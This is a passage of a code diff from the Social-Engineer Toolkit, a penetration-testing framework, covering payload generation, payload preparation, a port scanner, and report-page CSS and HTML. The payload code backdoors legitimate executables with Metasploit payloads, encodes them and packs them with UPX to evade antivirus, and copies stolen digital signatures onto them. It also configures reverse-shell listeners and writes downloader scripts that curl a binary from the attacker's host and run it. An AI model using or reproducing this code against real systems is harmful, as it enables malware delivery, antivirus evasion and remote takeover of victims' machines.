# If option 16, backdoor executable better AV avoidance
if encode == "BACKDOOR":
print_info("Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...")
backdoor_execution = check_config("BACKDOOR_EXECUTION=").lower()
if backdoor_execution == "on": backdoor_execution = "-k"
if backdoor_execution != "on": backdoor_execution = ""
subprocess.Popen("cp %s src/program_junk/legit.exe 1> /dev/null 2> /dev/null" % (custom_exe), shell=True).wait()
encodepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s | ruby %s/msfencode -c 10 -e x86/shikata_ga_nai -x src/program_junk/legit.exe -o %s/src/html/msf.exe -t exe %s 1> /dev/null 2>/dev/null" % (path,choice1,choice2,portnum,courtesyshell,choice4,path,definepath,backdoor_execution), shell=True).wait()
print_status("Backdoor completed successfully. Payload is now hidden within a legit executable.")
# define to use UPX or not
if upx_encode == "ON":
if choice1 != "set/reverse_shell":
print_status("UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.")
upx("src/html/msf.exe")
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", "src/html/msf.exe", "src/program_junk/msf2.exe")
subprocess.Popen("cp src/program_junk/msf2.exe src/html/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe", shell=True).wait()
encode1=("x86/shikata_ga_nai")
if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp' :
print_info("When the payload is downloaded, you will want to connect to the victim directly.")
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell": attack_vector = "set_payload"
# if we have the java attack, multiattack java, and the set interactive shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
# pull in the ports from config
port1=check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=") == "ON":
port2=check_config("LINUX_REVERSE_PORT=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/src/html/mac.bin;chmod 755 %s/src/html/mac.bin" % (path,choice2,port1,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/src/html/nix.bin" % (path,choice2,port2,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
# try block here
try:
# if they want a listener, start here
filewrite=file("%s/src/program_junk/meta_config" % (definepath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/src/program_junk/multi_meta" % (definepath)):
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript migrate -f\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\n\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo": filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD osx/x86/shell_reverse_tcp" +"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port1+"\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD linux/x86/shell/reverse_tcp"+"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port2+"\n")
if linux_meterpreter_multi == "ON":
multiwrite=file("src/program_junk/lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/lin_multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
except Exception, e:
log(e)
print_error("ERROR:Something went wrong:")
print bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remenant files
if attack_vector == "multiattack":
multiattack.close()
if os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
filewrite=file("%s/src/program_junk/payload.options" % (definepath), "w")
filewrite.write(choice1+" 0.0.0.0 " + choice3)
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile("src/program_junk/meta_config"): os.remove("src/program_junk/meta_config")

37
src/core/payloadgen/solo.py Normal file
View file

@ -0,0 +1,37 @@
#!/usr/bin/python
import subprocess
import os
import re
import sys
from src.core.setcore import *
# definepath
definepath=os.getcwd()
sys.path.append(definepath)
meta_path = meta_path()
# launch msf listener
print_info("The payload can be found in the SET home directory.")
# j0fer 06-27-2012 # choice = raw_input(setprompt("0", "Start the listener now? [yes|no]"))
choice = yesno_prompt("0", "Start the listener now? [yes|no]")
# j0fer 06-27-2012 # if choice == "yes" or choice == "y":
if choice == "YES":
# if we didn't select the SET interactive shell as our payload
if not os.path.isfile("src/program_junk/set.payload"):
print_info("Please wait while the Metasploit listener is loaded...")
subprocess.Popen("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path), shell=True).wait()
# if we did select the set payload as our option
if os.path.isfile("src/program_junk/set.payload"):
fileopen = file("src/program_junk/port.options", "r")
set_payload = file("src/program_junk/set.payload", "r")
port = fileopen.read().rstrip()
set_payload = set_payload.read().rstrip()
if set_payload == "SETSHELL":
print_info("Starting the SET Interactive Shell Listener on %s." % (port))
subprocess.Popen("python src/payloads/set_payloads/listener.py %s" % (port), shell=True).wait()
if set_payload == "RATTE":
print_info("Starting the RATTE Shell on %s." % (port))
subprocess.Popen("src/payloads/ratte/ratteserver %s" % (port), shell=True).wait()

239
src/core/payloadprep.py Normal file
View file

@ -0,0 +1,239 @@
#!/usr/bin/python
############################################
#
# Code behind the SET interactive shell
# and RATTE
#
############################################
import os
import sys
import subprocess
import re
import shutil
from src.core import setcore
import time
definepath = os.getcwd()
sys.path.append(definepath)
# grab operating system
operating_system = setcore.check_os()
# check the config file
fileopen = file("config/set_config", "r")
for line in fileopen:
line = line.rstrip()
# define if we use upx encoding or not
match = re.search("UPX_ENCODE=", line)
if match:
upx_encode = line.replace("UPX_ENCODE=", "")
# set the upx flag
match1 = re.search("UPX_PATH=", line)
if match1:
upx_path = line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
if operating_system != "windows":
setcore.print_warning("UPX packer not found in the pathname specified in config. Disabling UPX packing for executable")
upx_encode == "OFF"
# if we removed the set shells to free up space, needed for pwniexpress
match2= re.search("SET_INTERACTIVE_SHELL=", line)
if match2:
line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
if line == "off":
sys.exit("\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there
if not os.path.isdir("src/program_junk/web_clone/"):
os.makedirs("src/program_junk/web_clone/")
# grab ip address and SET web server interface
if os.path.isfile("src/program_junk/interface"):
fileopen = file("src/program_junk/interface", "r")
for line in fileopen:
ipaddr = line.rstrip()
if os.path.isfile("src/program_junk/ipaddr.file"):
fileopen = file ("src/program_junk/ipaddr.file", "r")
for line in fileopen:
webserver = line.rstrip()
if not os.path.isfile("src/program_junk/ipaddr.file"):
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on for the reverse listener"))
else:
if os.path.isfile("src/program_junk/ipaddr.file"):
fileopen = file("src/program_junk/ipaddr.file", "r")
for line in fileopen:
ipaddr = line.rstrip()
webserver = ipaddr
# grab port options from payloadgen.py
if os.path.isfile("src/program_junk/port.options"):
fileopen = file("src/program_junk/port.options", "r")
for line in fileopen:
port = line.rstrip()
else:
port = raw_input(setcore.setprompt("0", "Port you want to use for the connection back"))
# define the main variables here
# generate a random executable name per instance
exe_name = setcore.generate_random_string(10,10) + ".exe"
webserver = webserver + " " + port
# store for later
reverse_connection = webserver
webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE payload or SET payload
if os.path.isfile("src/program_junk/set.payload"):
fileopen = file("src/program_junk/set.payload", "r")
for line in fileopen:
payload_selection = line.rstrip()
else:
payload_selection = "SETSHELL"
# determine if we want to target osx/nix as well
posix = False
# find if we selected it
if os.path.isfile("%s/src/program_junk/set.payload.posix" % (definepath)):
# if we have then claim true
posix = True
# if we selected the SET Interactive shell in payloadgen
if payload_selection == "SETSHELL":
# replace ipaddress with one that we need for reverse connection back
fileopen = open("src/payloads/set_payloads/downloader.windows" , "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe" , "wb")
host = int(len(exe_name)+1) * "X"
webserver_count = int(len(webserver)+1) * "S"
ipaddr_count = int(len(ipaddr)+1) * "M"
filewrite.write(data.replace(str(host), exe_name+"\x00", 1))
filewrite.close()
fileopen = open("src/program_junk/msf.exe" , "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe" , "wb")
filewrite.write(data.replace(str(webserver_count), webserver+"\x00", 1))
filewrite.close()
fileopen = open("src/program_junk/msf.exe" , "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe" , "wb")
filewrite.write(data.replace(str(ipaddr_count), ipaddr+"\x00", 1))
filewrite.close()
shutil.copyfile("src/program_junk/msf.exe", "src/html/msf.exe")
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
fileopen = file("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe", "wb")
host = int(len(ipaddr)+1) * "X"
rPort = int(len(str(port))+1) * "Y"
filewrite.write(data.replace(str(host), ipaddr+"\x00", 1))
filewrite.close()
fileopen = open("src/program_junk/msf.exe", "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe", "wb")
filewrite.write(data.replace(str(rPort), str(port)+"\x00", 1))
filewrite.close()
setcore.print_status("Done, moving the payload into the action.")
if upx_encode == "ON" or upx_encode == "on":
# core upx
pass #setcore.upx("src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile("%s/src/program_junk/web_clone/x" %(definepath)):
os.remove("%s/src/program_junk/web_clone/x" % (definepath))
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath))
# if we are targetting nix
if posix == True:
setcore.print_info("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w")
payload_flags = webserver.split(" ")
# grab osx binary name
osx_name = setcore.generate_random_string(10,10)
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
filewrite.write(downloader)
filewrite.close()
# grab nix binary name
linux_name = setcore.generate_random_string(10,10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w")
filewrite.write(downloader)
filewrite.close()
shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name))
shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))
# check to see if we are using a staged approach or direct shell
stager = setcore.check_config("SET_SHELL_STAGER=").lower()
if stager == "off" or payload_selection == "SETSHELL_HTTP":
# only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
# ensure that index.html is really there
if os.path.isfile("src/program_junk/web_clone/index.html"):
setcore.print_status("Stager turned off, prepping direct download payload...")
fileopen = file("src/program_junk/web_clone/index.html", "r")
filewrite = file("src/program_junk/web_clone/index.html.3", "w")
data = fileopen.read()
# replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection)
filewrite.write(data)
filewrite.close()
time.sleep(1)
# here we remove old stuff and replace with everything we need to be newer
if payload_selection == "SETSHELL":
try:
if os.path.isfile("src/program_junk/web_clone/index.html"):
os.remove("src/program_junk/web_clone/index.html")
shutil.copyfile("src/program_junk/web_clone/index.html.3", "src/program_junk/web_clone/index.html")
if os.path.isfile("src/program_junk/web_clone/index.html.3"):
os.remove("src/program_junk/web_clone/index.html.3")
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/program_junk/web_clone/x", "src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/html/msf.exe"):
os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
# catch errors, will convert to log later
except Exception, error:
setcore.log(error)
# if we are using the HTTP reverse shell then lets use this
if payload_selection == "SETSHELL_HTTP":
try:
if os.path.isfile("src/program_junk/web_clone/index.html"):
os.remove("src/program_junk/web_clone/index.html")
shutil.copyfile("src/program_junk/web_clone/index.html.3", "src/program_junk/web_clone/index.html")
if os.path.isfile("src/program_junk/web_clone/index.html.3"):
os.remove("src/program_junk/web_clone/index.html.3")
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/payloads/set_payloads/http_shell.binary", "src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/html/msf.exe"):
os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
# catch errors, will convert to log later
except Exception, error:
setcore.log(error)

176
src/core/portscan.py Normal file
View file

@ -0,0 +1,176 @@
#
#
# SET SIMPLE PORT SCANNER
#
#
from src.core.setcore import *
import socket
import sys
import Queue
import re
import thread
import threading
import time
MAX_THREADS = 200
host_list = ""
class Scanner(threading.Thread):
def __init__(self, inq, outq):
threading.Thread.__init__(self)
self.setDaemon(1)
# queues for (host, port)
self.inq = inq
self.outq = outq
def run(self):
while 1:
host, port = self.inq.get()
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.settimeout(1.0)
try:
# connect to the given host:port
sd.connect((host, port))
except socket.error:
# set the CLOSED flag
self.outq.put((host, port, 'CLOSED'))
sd.close()
else:
self.outq.put((host, port, 'OPEN'))
sd.close()
def scan(host, start, stop):
global host_list
toscan = Queue.Queue()
scanned = Queue.Queue()
host_down = 0
scanners = [Scanner(toscan, scanned)]
for scanner in scanners:
scanner.start()
hostports = [(host, port) for port in xrange(start, stop+1)]
for hostport in hostports:
toscan.put(hostport)
results = {}
for host, port in hostports:
while (host, port) not in results:
nhost, nport, nstatus = scanned.get()
results[(nhost, nport)] = nstatus
status = results[(host, port)]
if status <> 'CLOSED':
port_open = '%s:%d %s' % (host, port, status)
print_status(port_open)
host_list = host_list + "," + port_open
host_down = 1
# if no hosts were up then report host down
if host_down == 0:
return False
# else host is up and return those hosts
if host_down == 1:
time.sleep(1)
#host_list = str(host_list[1:])
return host_list
# Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license.
# http://brandon.sternefamily.net/files/mit-license.txt
# CIDR Block Converter - 2007
# convert an IP address from its dotted-quad format to its
# 32 binary digit representation
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q),8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
outQuads -= 1
return b
# convert a decimal number to binary representation
# if d is specified, left-pad the binary number with 0s to that length
def dec2bin(n,d=None):
s = ""
while n>0:
if n&1:
s = "1"+s
else:
s = "0"+s
n >>= 1
if d is not None:
while len(s)<d:
s = "0"+s
if s == "": s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0,len(b),8):
ip += str(int(b[i:i+8],2))+"."
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def printCIDR(c,lowport,highport):
parts = c.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
# Python string-slicing weirdness:
# if a subnet of 32 was specified simply print the single IP
if subnet == 32:
ipaddr = bin2ip(baseIP)
# for any other size subnet, print a list of IP addresses by concatenating
# the prefix with each of the suffixes in the subnet
else:
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
ip_check = is_valid_ip(ipaddr)
if ip_check != False:
scan(str(ipaddr), int(lowport), int(highport))
time.sleep(1)
# input validation routine for the CIDR block specified
def validateCIDRBlock(b):
# appropriate format for CIDR block ($prefix/$subnet)
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
if not p.match(b):
return False
# extract prefix and subnet size
prefix, subnet = b.split("/")
# each quad has an appropriate value (1-255)
quads = prefix.split(".")
for q in quads:
if (int(q) < 0) or (int(q) > 255):
#print "Error: quad "+str(q)+" wrong size."
return False
# subnet is an appropriate value (1-32)
if (int(subnet) < 1) or (int(subnet) > 32):
print "Error: subnet "+str(subnet)+" wrong size."
return False
# passed all checks -> return True
return True
# start the actual stuff to grab cidr and port scan
def launch(cidrBlock,lowport,highport):
print_status("SET is now scanning the IPs specified... please be patient.")
if not validateCIDRBlock(cidrBlock):
# validate its really an ip address if solo
ip_check = is_valid_ip(cidrBlock)
if ip_check != False:
print_status("CIDR notation not specified. Trying single IP address.")
scan(cidrBlock, int(lowport), int(highport))
return host_list
else:
print_warning("Invalid IP Address, try again.")
else:
printCIDR(cidrBlock,lowport,highport)
return host_list

BIN
src/core/reports/files/logo.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 169 KiB

BIN
src/core/reports/files/main.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 419 B

BIN
src/core/reports/files/rss.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 7.4 KiB

475
src/core/reports/files/style.css Normal file
View file

@ -0,0 +1,475 @@
/*
Theme Name: Sec-Maniac
Theme URI: http://www.ticktockcomputers.com/
Description: Designed by <a href="http://www.ticktockcomputers.com/">DigiP</a>.
Version: 0.1
Author: <a href="http://www.ticktockcomputers.com/">Tick Tock Computers LLC</a>
Author URI: http://www.ticktockcomputers.com/
*/
/* Lite CSS browser reset - DigiP */
ul li, li, ol, table, tr, td, div, p, blockquote, body, h1, h2, h3, a, img {
border:0px;
margin:0px;
padding:0px;
border-collapse:collapse;
font-weight:normal;
}
body {
background-color:#000;
background-image:url(images/header.jpg);
background-repeat:repeat-x;
color:#fff;
font-family:"trebuchet ms",arial,sans-serif,"sans serif";
font-size:16px;
}
a {
color:#468dab;
text-decoration:none;
}
a:hover {
color:#41baed;
text-decoration:underline;
}
a img {
border:none;
border-style:none;
}
h1 {
font-size:26px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
width:97%;
margin:2px auto 2px auto;
}
.full {
font-size:26px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
width:100%;
margin:2px auto 2px auto;
}
h2{
font-size:22px;
margin-bottom:20px;
margin-top:10px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
}
h3 {
margin-top:15px;
font-size:18px;
margin-bottom:20px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
}
h4 {
margin-top:15px;
font-size:18px;
margin-bottom:20px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
}
h1 a, h2 a, h3 a, h4 a {
text-decoration:none;
}
h1 a:hover, h2 a:hover, h3 a:hover, h4 a:hover {
text-decoration:none;
}
.dates:before {
padding:10px 5px 20px 0px;
margin-bottom:10px;
content:url(images/date-icon.png);
position:relative;
top:10px;
left:-5px;
}
.dates {
border-bottom:none;
margin:0px 20px 20px 20px;
position:relative;
float:right;
font-size:12px;
}
p {
margin-bottom:20px;
}
#header {
width:1000px;
height:335px;
margin-left:auto;
margin-right:auto;
}
#logo {
}
#nav {
text-align:justify;
width:1000px;
}
.nav-button {
padding:2px 1px 3px 1px;
}
.nav-button:hover {
background-color:#121212;
padding:2px 0px 2px 0px;
border-left:solid #444 1px; /* Give buttons slight 3d effect */
border-right:solid #222 1px;
border-bottom:solid #222 1px;
}
#content {
background-color:#212121;
display:block;
text-align:justify;
padding:20px;
width:960px;
height:auto;
margin-left:auto;
margin-right:auto;
margin-bottom:15px;
border-top:solid #468dab 3px; /* two-toned border */
border-right:solid #468dab 3px;
border-bottom:solid #3d738a 3px;
border-left:solid #3d738a 3px;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
#content-home {
background-color:#0f0f0f;
display:block;
text-align:justify;
padding:20px;
width:960px;
height:auto;
margin-left:auto;
margin-right:auto;
margin-bottom:15px;
border-top:solid #468dab 3px; /* two-toned border */
border-right:solid #468dab 3px;
border-bottom:solid #3d738a 3px;
border-left:solid #3d738a 3px;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
.post-home {
margin-bottom:25px;
}
.post-home .entry p {
font-size:16px;
}
#content-hassidebar {
background-color:#212121;
display:table;
position:relative;
clear:both;
text-align:justify;
padding:20px;
width:960px;
height:auto;
margin-left:auto;
margin-right:auto;
margin-bottom:15px;
border-top:solid #468dab 3px; /* two-toned border */
border-right:solid #468dab 3px;
border-bottom:solid #3d738a 3px;
border-left:solid #3d738a 3px;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
.post {
border:solid #333 1px;
margin-bottom:25px;
background-color:#0f0f0f;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
.post-hassidebar {
margin:15px -10px 25px 15px;
border:solid #333 1px;
background-color:#0f0f0f;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
width:630px;
float:left;
display:block;
}
.post .entry, .post-hassidebar .entry {
padding:15px;
}
.post .entry p {
font-size:16px;
}
.entry img {
max-width:550px;
width: expression(this.width > 550 ? 550: true); /* IE hack since it doesn't recognize max-width standard */
}
.entry object {
display:block;
position:relative;
clear:both;
margin:15px auto 15px auto;
border-top:solid #122d39 7px;
border-right:solid #122d39 7px;
border-bottom:solid #0f232b 7px;
border-left:solid #0f232b 7px;
-webkit-border-radius: 0px 7px 7px 7px; /* webkit non standard, older browser versions */
-moz-border-radius: 7px; /* mozilla non standard, older browser versions */
border-radius: 0px 7px 7px 7px;
max-width:550px;
width: expression(this.width > 550 ? 550: true); /* IE hack since it doesn't recognize max-width standard */
}
.entry embed {
max-width:550px;
width: expression(this.width > 550 ? 550: true); /* IE hack since it doesn't recognize max-width standard */
}
#footer {
margin-bottom:20px;
}
#copyright{
font-size:12px;
}
.navigation {
position:relative;
clear:both;
}
.navigation .nav-old {
float:left;
position:relative;
}
.navigation .nav-newer {
float:right;
position:relative;
}
.sidebarWidgetDigi {
width:230px;
display:block;
padding:20px;
}
.sidebarWidgetDigiH4 {
position:relative;
border:none;
margin-bottom:5px;
}
#sidebar {
width:260px;
position:relative;
margin:15px 15px 25px 20px;
padding:5px 15px 5px 5px;
display:block;
float:right;
border:solid #333 1px;
background-color:#0f0f0f;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
#calendar_wrap table {
background-color:#ccc;
border: solid #ccc 1px;
width:100%;
}
#wp-calendar th {
background-color:#aaa;
color:#000;
width:10px;
text-align:center;
}
#wp-calendar td {
width:10px;
background-color:#ccc;
text-indent:7px;
color:#000;
}
#wp-calendar td a {
color:#005da5;
}
#wp-calendar td:hover a:hover {
color:#f5f5f5;
}
#wp-calendar td:hover {
background-color:#606060;
color:#000;
}
#comment {
width:500px;
padding:0px;
margin-left:auto;
margin-right:auto;
}
#commentlist {
list-style-type:none;
border-collapse:collapse;
margin:0px;
padding:0px;
}
#commentlist li {
position:relative;
margin-bottom:20px;
padding:10px 10px 60px 10px;
border:solid #606060 2px;
background-color:#202020;
color:#fff;
-moz-border-radius:8px;
-webkit-border-radius:8px;
border-radius:8px;
}
img.avatar {
position:relative;
float:left;
margin:16px 20px 10px 0px;
border:solid #424242 12px;
-moz-border-radius:8px;
-webkit-border-radius:8px;
border-radius:8px;
clear:both;
}
#digi-comments {
position:relative;
width: 670px;
margin:30px auto 30px auto;
display:block;
padding:50px;
background-color:#000;
clear:both;
-moz-border-radius:5px 5px 10px 10px;
-webkit-border-radius:5px 5px 10px 10px;
border-radius:5px 5px 10px 10px;
}
/* code is old school - Should switch to plugin instead, looks much better and has syntax highlighting, see - http://wordpress.org/extend/plugins/codecolorer/installation/ */
code {
color: #acacac;
background: #222222;
border:solid #434343 1px;
font-size: 14px;
margin: 0px;
padding: 15px;
display: block;
font:11px Monaco, monospace;
}
.shr-bookmarks { /* if using sexy share plugin */
float:left;
position:relative;
margin-right:-30px;
margin-top:-0px;
margin-bottom:20px;
clear:both;
width:550px;
}
.pages_ {
border:solid #606060 2px;
padding:2px 7px 2px 7px;
margin:0px 2px 0px 0px;
background-color:#c4c4c4;
}
.pages_:hover {
border:solid #606060 2px;
padding:2px 7px 2px 7px;
margin:0px 2px 0px 0px;
background-color:#fff;
}
a .pages_:hover {
color:#000;
}
.archives {
clear:both;
}
ul li {
text-align:left;
font-size:14px;
}
#socialmedia2 {
display:none;
}
#socialmedia {
position:fixed;
right:8px;
top:10%;
width:50px;
height:150px;
z-index:9999;
line-height:10px;
}

BIN
src/core/reports/files/tweet.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 6.8 KiB

119
src/core/reports/index.html Normal file
View file

@ -0,0 +1,119 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<title>SecManiac.com - The home of David Kennedy (ReL1K)</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=100"> <!-- Force IE8 Compatibility mode OFF -->
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
<link rel="stylesheet" href="files/style.css" type="text/css">
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.secmaniac.com/feed/">
<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.secmaniac.com/feed/rss/">
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.secmaniac.com/feed/atom/">
<link rel="pingback" href="http://www.secmaniac.com/xmlrpc.php">
<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Feed" href="http://www.secmaniac.com/feed/">
<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Comments Feed" href="http://www.secmaniac.com/comments/feed/">
</head><body>
<div id="header">
<div id="socialmedia2">
<a href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
<a href="http://twitter.com/dave_rel1k"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
</div>
<div id="logo">
<a href="http://www.secmaniac.com/"><img src="files/logo.png" alt="SecManiac.com"></a>
</div>
</div>
<div id="content">
<h1><a href="http://www.secmaniac.com/">The Social-Engineer Toolkit (SET) Report Generator</a></h1>
<div class="post">
